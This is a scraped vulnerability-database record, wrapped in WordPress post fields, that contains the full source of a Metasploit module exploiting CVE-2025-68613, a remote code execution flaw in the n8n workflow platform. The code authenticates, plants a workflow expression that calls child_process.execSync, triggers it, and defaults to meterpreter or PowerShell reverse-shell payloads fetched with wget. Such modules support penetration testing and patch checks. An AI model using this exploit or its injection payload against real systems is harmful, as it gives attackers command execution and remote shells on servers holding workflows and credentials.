{“lastseen”:”2026-01-13T19:28:01″,”description”:”This module exploits a critical remote code execution vulnerability CVE-2025-68613 in the n8n workflow automation platform. The vulnerability exists in the workflow expression evaluation system where user-supplied expressions enclosed in are evaluated…”,”published”:”2026-01-13T18:59:06″,”modified”:”2026-01-13T18:59:06″,”type”:”metasploit”,”title”:”n8n Workflow Expression Remote Code Execution”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-N8N_WORKFLOW_EXPRESSION_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-68613″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘n8n Workflow Expression Remote Code Execution’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a critical remote code execution vulnerability (CVE-2025-68613)\\n in the n8n workflow automation platform. The vulnerability exists in the workflow\\n expression evaluation system where user-supplied expressions enclosed in {{ }}\\n are evaluated in an execution context that is not sufficiently isolated from the\\n underlying Node.js runtime.\\n\\n An authenticated attacker can create a workflow containing malicious expressions\\n that access the Node.js process object via this.process.mainModule.require (or via\\n the constructor) to load child_process and execute arbitrary system commands.\\n This module uses a Schedule Trigger node to automatically fire and evaluate the\\n malicious payload. This requires valid credentials to create workflows.\\n\\n Successful exploitation may lead to full compromise of the n8n instance,\\n including unauthorized access to sensitive data, modification of workflows,\\n and execution of system-level operations.\\n\\n Affected versions: \\u003e= 0.211.0 and \\u003c 1.120.4, \\u003c 1.121.1, \\u003c 1.122.0\\n },\\n ‘Author’ =\\u003e [\\n ‘Lukas Johannes M\u00f6ller’\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-68613’],\\n [‘URL’, ‘https:\/\/github.com\/n8n-io\/n8n\/security\/advisories’],\\n [‘URL’, ‘https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-68613’]\\n ],\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’, ‘win’],\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Unix\/Linux Command’,\\n {\\n ‘Platform’ =\\u003e %w[unix linux],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :unix_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n # cmd\/unix payloads use commands that might not be present in docker instance\\n ‘PAYLOAD’ =\\u003e ‘cmd\/linux\/http\/x64\/meterpreter_reverse_tcp’,\\n ‘FETCH_COMMAND’ =\\u003e ‘wget’\\n }\\n }\\n ],\\n [\\n ‘Windows Command’,\\n {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :win_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/windows\/powershell_reverse_tcp’\\n }\\n }\\n ]\\n ],\\n ‘Payload’ =\\u003e {\\n ‘BadChars’ =\\u003e %(‘)\\n },\\n ‘Privileged’ =\\u003e false,\\n ‘DisclosureDate’ =\\u003e ‘2025-06-10’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 5678,\\n ‘SSL’ =\\u003e false\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘Base path to n8n’, ‘\/’]),\\n OptString.new(‘USERNAME’, [true, ‘n8n username or email for authentication’]),\\n OptString.new(‘PASSWORD’, [true, ‘n8n password for authentication’])\\n ]\\n )\\n end\\n\\n def check\\n return CheckCode::Unknown(‘Could not authenticate to n8n’) unless authenticate\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘rest’, ‘settings’)\\n )\\n\\n return CheckCode::Unknown(‘Could not connect to n8n’) if res.blank?\\n return CheckCode::Detected(‘Connected to n8n, received unexpected response’) unless res.code == 200\\n\\n json = res.get_json_document\\n version = Rex::Version.new(json.dig(‘data’, ‘versionCli’))\\n\\n return CheckCode::Detected(‘n8n detected but could not determine version’) unless version\\n\\n print_status(\\”Detected n8n version: #{version}\\”)\\n\\n return CheckCode::Appears(\\”Version #{version} is vulnerable\\”) if version.between?(Rex::Version.new(‘0.211.0’), Rex::Version.new(‘1.120.4’)) || version == Rex::Version.new(‘1.121.0’)\\n\\n CheckCode::Safe(\\”Version #{version} is not vulnerable\\”)\\n end\\n\\n def authenticate\\n print_status(‘Attempting to authenticate…’)\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘rest’, ‘login’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘data’ =\\u003e {\\n ’emailOrLdapLoginId’ =\\u003e datastore[‘USERNAME’],\\n ’email’ =\\u003e datastore[‘USERNAME’],\\n ‘password’ =\\u003e datastore[‘PASSWORD’]\\n }.to_json\\n )\\n\\n return true if res\\u0026.code == 200\\n\\n json_data = res.get_json_document\\n\\n print_error(\\”Login failed: #{json_data[‘message’]}\\”)\\n\\n false\\n end\\n\\n def create_malicious_workflow(cmd)\\n expression_payload = %\\u003c{{ (function(){ return this.process.mainModule.require(‘child_process’).execSync(‘#{cmd}’).toString() })() }}\\u003e\\n\\n @workflow_name = \\”workflow_#{Rex::Text.rand_text_alphanumeric(8)}\\”\\n\\n workflow_data = {\\n ‘name’ =\\u003e @workflow_name,\\n ‘active’ =\\u003e false,\\n ‘settings’ =\\u003e {\\n ‘saveDataErrorExecution’ =\\u003e ‘all’,\\n ‘saveDataSuccessExecution’ =\\u003e ‘all’,\\n ‘saveManualExecutions’ =\\u003e true,\\n ‘executionOrder’ =\\u003e ‘v1’\\n },\\n ‘nodes’ =\\u003e [\\n {\\n parameters: {},\\n type: ‘n8n-nodes-base.manualTrigger’,\\n typeVersion: 1,\\n position: [\\n 0,\\n 0\\n ],\\n ‘id’ =\\u003e Rex::Text.rand_text_alphanumeric(36),\\n name: \\”When clicking ‘Execute workflow’\\”\\n },\\n {\\n parameters: {\\n values: {\\n string: [\\n {\\n value: \\”=#{expression_payload}\\”\\n }\\n ]\\n },\\n options: {}\\n },\\n id: ‘40031677-e085-4434-9168-fb0b21ead60d’,\\n name: ‘Set’,\\n type: ‘n8n-nodes-base.set’,\\n typeVersion: 1,\\n position: [\\n 220,\\n 0\\n ]\\n }\\n ],\\n ‘connections’ =\\u003e {\\n \\”When clicking ‘Execute workflow’\\” =\\u003e {\\n ‘main’ =\\u003e [\\n [\\n {\\n ‘node’ =\\u003e ‘Set’,\\n ‘type’ =\\u003e ‘main’,\\n ‘index’ =\\u003e 0\\n }\\n\\n ]\\n ]\\n }\\n }\\n }\\n\\n print_status(‘Creating malicious workflow…’)\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘rest’, ‘workflows’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘data’ =\\u003e workflow_data.to_json\\n )\\n\\n fail_with(Failure::UnexpectedReply, \\”Failed to create workflow: #{res\\u0026.code}\\”) unless res\\u0026.code == 200 || res\\u0026.code == 201\\n\\n json = res.get_json_document\\n\\n @workflow_id = json.dig(‘data’, ‘id’) || json[‘id’]\\n nodes = json.dig(‘data’, ‘nodes’)\\n version_id = json.dig(‘data’, ‘versionId’)\\n id = json.dig(‘data’, ‘id’)\\n\\n fail_with(Failure::UnexpectedReply, ‘Failed to get workflow ID from response’) unless @workflow_id \\u0026\\u0026 nodes \\u0026\\u0026 version_id \\u0026\\u0026 id\\n\\n activation_data = {\\n ‘workflowData’ =\\u003e {\\n ‘name’ =\\u003e @workflow_name,\\n ‘nodes’ =\\u003e nodes,\\n ‘pinData’ =\\u003e {},\\n ‘connections’ =\\u003e {\\n \\”When clicking ‘Execute workflow’\\” =\\u003e {\\n ‘main’ =\\u003e [\\n [\\n {\\n ‘node’ =\\u003e ‘Set’,\\n ‘type’ =\\u003e ‘main’,\\n ‘index’ =\\u003e 0\\n }\\n ]\\n ]\\n }\\n },\\n ‘active’ =\\u003e false,\\n ‘settings’ =\\u003e {\\n ‘saveDataErrorExecution’ =\\u003e ‘all’,\\n ‘saveDataSuccessExecution’ =\\u003e ‘all’,\\n ‘saveManualExecutions’ =\\u003e true,\\n ‘executionOrder’ =\\u003e ‘v1’\\n },\\n ‘tags’ =\\u003e [],\\n ‘versionId’ =\\u003e version_id,\\n ‘meta’ =\\u003e ‘null’,\\n ‘id’ =\\u003e id\\n },\\n ‘startNodes’ =\\u003e [],\\n ‘destinationNode’ =\\u003e ‘Set’\\n }\\n\\n print_status(‘Triggering malicious workflow…’)\\n\\n # older versions on n8n allow to execute workflow without workflow ID, while the newer versions\\n # have URI rest\/workflow\/[workflow ID]\/run available to make workflow run. If the first request\\n # returns 404, it means that it is probably newer version, so module will try the second variant.\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘rest’, ‘workflows’, ‘run’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘data’ =\\u003e activation_data.to_json\\n )\\n\\n if res\\u0026.code == 404\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘rest’, ‘workflows’, @workflow_id.to_s, ‘run’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘data’ =\\u003e activation_data.to_json\\n )\\n end\\n\\n fail_with(Failure::PayloadFailed, ‘Could not start workflow’) unless res\\u0026.code == 200\\n\\n print_good(\\”Created workflow with ID: #{@workflow_id}\\”)\\n end\\n\\n def archive_workflow\\n print_status(\\”Cleaning up workflow #{@workflow_id}…\\”)\\n\\n send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘rest’, ‘workflows’, @workflow_id.to_s, ‘archive’),\\n ‘keep_cookies’ =\\u003e true\\n )\\n end\\n\\n def exploit\\n cookie_jar.clear\\n\\n fail_with(Failure::NoAccess, ‘Could not authenticate’) unless authenticate\\n\\n create_malicious_workflow(payload.encoded)\\n end\\n\\n def cleanup\\n super\\n if @workflow_id\\n archive_workflow\\n # delete workflow\\n send_request_cgi(\\n ‘method’ =\\u003e ‘DELETE’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘rest’, ‘workflows’, @workflow_id.to_s)\\n )\\n end\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/n8n_workflow_expression_rce.rb”,”cvss”:{“score”:9.9,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/n8n_workflow_expression_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-13T19:28:01″,”description”:”This module exploits a critical remote code execution vulnerability CVE-2025-68613 in the n8n workflow automation platform. The vulnerability exists in the workflow expression evaluation system…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,45,12,169,13,7,11,5],"class_list":["post-35459","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-99","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n